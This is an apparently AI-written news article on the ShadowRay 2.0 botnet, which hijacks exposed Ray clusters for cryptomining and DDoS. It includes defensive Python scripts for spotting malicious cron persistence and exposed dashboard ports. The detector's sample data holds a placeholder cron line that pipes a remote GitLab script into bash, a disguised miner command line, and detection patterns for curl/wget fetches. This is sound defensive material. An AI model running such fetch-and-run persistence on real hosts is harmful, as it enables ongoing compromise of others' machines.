Ethical Hacking News

The ShadowRay 2.0 Botnet: A Cryptocurrency Mining Menace Spreading Across Unpatched Ray Clusters



The ShadowRay 2.0 botnet is spreading across unpatched Ray clusters, hijacking their computing power for illicit cryptocurrency mining. This highly sophisticated attack exploits a critical missing authentication bug in the Ray open-source AI framework, leaving many organizations vulnerable to this menace.

  • ShadowRay 2.0 is a highly sophisticated botnet spreading across unpatched Ray clusters for illicit cryptocurrency mining.
  • The attack exploits a critical missing authentication bug in the Ray open-source AI framework, leaving many organizations vulnerable.
  • The botnet uses GitLab and GitHub to deliver malware, showcasing its ability to quickly resume operations after takedown efforts.
  • The payloads use orchestration capabilities to pivot laterally to non-internet-facing nodes, spread malware, and establish persistence.
  • Large language models are likely used by the attackers, as evident from the malware's structure and error handling patterns.
  • The infection chain includes region-specific versions of malware for Chinese victims and tactics to evade detection, such as disguising malicious processes.
  • The attack surface is created by more than 230,500 publicly accessible Ray servers, making it a lucrative target for bad actors.
  • Measures to mitigate the threat include configuring firewall rules, adding authorization, and using tools like the "Ray Open Ports Checker".
  • The botnet's transformation into a multi-purpose platform with implications for denial-of-service attacks and rival mining infrastructure highlights its potential impact.



    The cybersecurity landscape has witnessed numerous attacks in recent years, each with its unique characteristics and methods of exploitation. However, a recent wave of attacks stands out for its sophistication and the scale at which it is being carried out. Known as ShadowRay 2.0, this botnet is spreading across unpatched Ray clusters, hijacking their computing power to engage in illicit cryptocurrency mining. The attack exploits a critical missing authentication bug in the Ray open-source artificial intelligence (AI) framework, leaving many organizations vulnerable to this menace.

    At its core, ShadowRay 2.0 is an evolution of a prior wave that was observed between September 2023 and March 2024. This earlier attack also utilized malicious jobs submitted through the Ray Job Submission API on exposed dashboards to compromise Ray clusters. The compromised clusters were then used in spray and pray attacks to distribute the payloads to other Ray dashboards, creating a worm that could spread from one victim to another. This initial wave of attacks demonstrated the potential for this botnet to cause significant disruptions.

    One of the most striking aspects of ShadowRay 2.0 is its use of GitLab and GitHub to deliver malware. The attackers created repositories with names such as "ironern440-group" and "thisisforwork440-ops," both of which are no longer accessible. However, after takedown efforts, the cybercriminals responded by creating new accounts, showcasing their tenacity and ability to quickly resume operations.

    The payloads used in ShadowRay 2.0 leverage the platform's orchestration capabilities to pivot laterally to non-internet-facing nodes, spread the malware, create reverse shells to attacker-controlled infrastructure for remote control, and establish persistence by running a cron job every 15 minutes that pulls the latest version of the malware from GitLab. These tactics are characteristic of highly sophisticated attacks, which often rely on exploiting vulnerabilities in popular platforms like Ray.

    The use of large language models (LLMs) is also noteworthy, as it suggests that the attackers have access to advanced tools and resources. The malware's structure, comments, and error handling patterns all point to this conclusion. This assessment is based on the malware's behavior and the potential capabilities of LLMs in creating complex payloads.

    The infection chain of ShadowRay 2.0 involves an explicit check to determine if the victim is located in China, and if so, serves a region-specific version of the malware. It also includes a mechanism designed to eliminate competition by scanning running processes for other cryptocurrency miners and terminating them – a tactic widely adopted by cryptojacking groups to maximize mining gains from hosts.

    Another notable aspect of this attack is its use of tactics to evade detection, including disguising malicious processes as legitimate Linux kernel worker services and limiting CPU usage to around 60%. These strategies are designed to make the botnet's presence harder to detect, allowing it to operate undetected for longer periods.
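    The two host-level indicators described above (a cron job firing every 15 minutes that re-fetches the payload from a code-hosting site, and a user-space process masquerading as a kernel worker) can be checked with a short script. The following is an added example written for this article, not code from the article, from the researchers, or from the Ray project. The crontab lines and the process table are constructed samples with placeholder URLs; the heuristic for spotting a fake kworker (real kernel worker threads are children of kthreadd, PID 2, and expose an empty cmdline) is a general Linux property, and the `live_process_table` helper for reading /proc is an assumption about where a defender would run this, not something the article prescribes.

```python
import os
import re

# Constructed sample crontab (placeholder URL, not a real indicator): the persistence
# mechanism the article describes is a job every 15 minutes re-fetching the payload.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/15 * * * * curl -fsSL https://gitlab.com/EXAMPLE-GROUP/EXAMPLE-REPO/-/raw/main/run.sh | bash
*/5 * * * * /opt/backup/snapshot.sh
"""

# Constructed process table as (pid, ppid, comm, cmdline). Genuine kworker threads are
# children of kthreadd (pid 2) and have an empty cmdline; a user-space process that only
# borrows the name has a real parent and a real command line.
SAMPLE_PROCESSES = [
    (2, 0, "kthreadd", ""),
    (35, 2, "kworker/0:1", ""),
    (1200, 1, "sshd", "/usr/sbin/sshd -D"),
    (4821, 1, "kworker/u8:3", "/tmp/.x/kworker --url EXAMPLE-POOL:3333 --cpu-limit 60"),
    (5102, 1200, "bash", "-bash"),
]

CRON_EVERY_15 = re.compile(r"^\*/15\s+\*\s+\*\s+\*\s+\*\s+(?P<cmd>.+)$")
REMOTE_FETCH = re.compile(
    r"\b(curl|wget|git)\b.*\b(gitlab\.com|github\.com|raw\.githubusercontent\.com)\b", re.I)


def suspicious_cron_entries(crontab_text):
    """Cron lines that fire every 15 minutes and pull content from a code-hosting site."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        match = CRON_EVERY_15.match(line)
        if match and REMOTE_FETCH.search(match.group("cmd")):
            hits.append(line)
    return hits


def fake_kernel_workers(processes):
    """PIDs of processes named like kworker threads that are not real kernel threads."""
    return [pid for pid, ppid, comm, cmdline in processes
            if comm.startswith("kworker") and (ppid != 2 or cmdline != "")]


def live_process_table():
    """Read (pid, ppid, comm, cmdline) for every process from /proc (Linux only)."""
    table = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/stat") as f:
                stat = f.read()
            with open(f"/proc/{entry}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").strip().decode(errors="replace")
        except OSError:
            continue  # process exited or is not readable
        # comm is wrapped in parentheses and may contain spaces, so split on the last ')'
        head, _, tail = stat.rpartition(")")
        comm = head.split("(", 1)[1]
        ppid = int(tail.split()[1])  # tail reads "state ppid pgrp ..."
        table.append((int(entry), ppid, comm, cmdline))
    return table


if __name__ == "__main__":
    print("suspicious cron entries:", suspicious_cron_entries(SAMPLE_CRONTAB))
    print("fake kernel workers:", fake_kernel_workers(SAMPLE_PROCESSES))
```

On a real host, replace the sample inputs with the output of `crontab -l` for each user (and the contents of /etc/cron.d) and with `live_process_table()`. A process that names itself `kworker` but is owned by a regular user, has a parent other than PID 2, and runs from a writable directory is worth investigating regardless of its CPU usage, since the article notes the miner throttles itself to around 60% precisely to avoid standing out on load graphs.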

    The fact that more than 230,500 Ray servers are publicly accessible has created a lucrative attack surface for bad actors. This is particularly concerning given that Ray is meant to be deployed within controlled network environments. The findings highlight the need for greater vigilance and proactive measures to prevent such attacks.

    To mitigate this threat, Anyscale has released a "Ray Open Ports Checker" tool to validate proper cluster configuration and prevent accidental exposure. Other strategies include configuring firewall rules to limit unauthorized access and adding authorization on top of the Ray Dashboard port (8265 by default). These steps aim to make it more difficult for attackers to exploit vulnerabilities in the first place.
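    Before adding firewall rules or authorization in front of the dashboard, the first thing to establish is whether the dashboard port is reachable from the network at all. The script below is an added example for this article; it is not Anyscale's "Ray Open Ports Checker" and not part of Ray. It parses the Linux /proc/net/tcp and /proc/net/tcp6 socket tables (a real kernel interface: addresses are little-endian hex, port is hex, state 0A is LISTEN) and reports every non-loopback address on which the dashboard port, 8265 by default as the article states, is listening. The socket-table snapshots embedded in the code are constructed samples, and the second loopback-only service in them on port 6379 is just filler, not a claim about what Ray binds there.

```python
import ipaddress
import socket

RAY_DASHBOARD_PORT = 8265  # default dashboard port named in the article (0x2049 in hex)
LISTEN_STATE = "0A"        # /proc/net/tcp state code for LISTEN

# Constructed /proc/net/tcp snapshots (not from a real host). 00000000 is the wildcard
# 0.0.0.0, 0100007F is 127.0.0.1, 0F02000A is 10.0.2.15 (bytes stored little-endian).
SAMPLE_EXPOSED = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:2049 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 30211 1 0000000000000000 100 0 0 10 0
   1: 0100007F:18EB 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 30180 1 0000000000000000 100 0 0 10 0
   2: 0F02000A:2049 0503000A:C3A1 01 00000000:00000000 00:00000000 00000000  1000        0 30290 1 0000000000000000 20 4 30 10 -1
"""

SAMPLE_LOOPBACK_ONLY = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:2049 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 30211 1 0000000000000000 100 0 0 10 0
"""

# /proc/net/tcp6 stores the address as four little-endian 32-bit words (32 hex chars).
SAMPLE_TCP6_EXPOSED = """\
  sl  local_address                         rem_address                         st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000000000000000000000000000:2049 00000000000000000000000000000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 30222 1 0000000000000000 100 0 0 10 0
"""


def _decode_addr(hex_addr):
    """Turn the kernel's hex address notation into a printable IPv4/IPv6 string."""
    raw = bytes.fromhex(hex_addr)
    if len(raw) == 4:
        return socket.inet_ntop(socket.AF_INET, raw[::-1])
    words = [raw[i:i + 4][::-1] for i in range(0, 16, 4)]
    return socket.inet_ntop(socket.AF_INET6, b"".join(words))


def listening_sockets(proc_net_tcp_text):
    """Return (address, port) for every socket in LISTEN state in a /proc/net/tcp dump."""
    sockets = []
    for line in proc_net_tcp_text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 4 or fields[3] != LISTEN_STATE:
            continue
        addr_hex, port_hex = fields[1].split(":")
        sockets.append((_decode_addr(addr_hex), int(port_hex, 16)))
    return sockets


def exposed_listeners(proc_net_tcp_text, port=RAY_DASHBOARD_PORT):
    """Addresses on which `port` is listening that are reachable beyond loopback."""
    return [addr for addr, p in listening_sockets(proc_net_tcp_text)
            if p == port and not ipaddress.ip_address(addr).is_loopback]


def live_check(port=RAY_DASHBOARD_PORT):
    """Run the check against the running host (Linux only); returns exposed addresses."""
    found = []
    for path in ("/proc/net/tcp", "/proc/net/tcp6"):
        try:
            with open(path) as f:
                found += exposed_listeners(f.read(), port)
        except OSError:
            pass  # file absent (non-Linux) or unreadable
    return found


if __name__ == "__main__":
    print("sample exposed on:", exposed_listeners(SAMPLE_EXPOSED))
    print("this host exposed on:", live_check())
```

An empty result means the dashboard only answers on 127.0.0.1 or ::1, so the Job Submission API used by the worm is unreachable from outside the host. Any other result is the signal to apply the measures the article lists: a firewall rule restricting the port to trusted networks and an authenticating proxy in front of it, since the dashboard itself does not require credentials.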

    Furthermore, researchers have observed that attackers are leveraging compromised Ray clusters to deploy sockstress, a TCP state exhaustion tool. This suggests that the compromised clusters are being weaponized for denial-of-service attacks, possibly against competing mining pools or other infrastructure. The ability to launch DDoS attacks adds another monetization vector – attackers can rent out DDoS capacity or use it to eliminate competition.

    This transformation of the operation from pure cryptojacking into a multi-purpose botnet has significant implications. Attackers can now utilize this platform for various malicious activities, further increasing its potential impact.

    The target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure are also occurring. This highlights the global nature of the threat and the need for a coordinated response to counter it.

    In light of these findings, it is clear that the ShadowRay 2.0 botnet poses a significant threat to organizations using Ray clusters. The ongoing nature of this attack, coupled with its use of sophisticated tactics, underscores the importance of vigilance and proactive measures in cybersecurity.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/The-ShadowRay-20-Botnet-A-Cryptocurrency-Mining-Menace-Spreading-Across-Unpatched-Ray-Clusters-ehn.shtml

  • https://thehackernews.com/2025/11/shadowray-20-exploits-unpatched-ray.html


  • Published: Thu Nov 20 11:45:13 2025 by llama3.2 3B Q4_K_M

    © Ethical Hacking News . All rights reserved.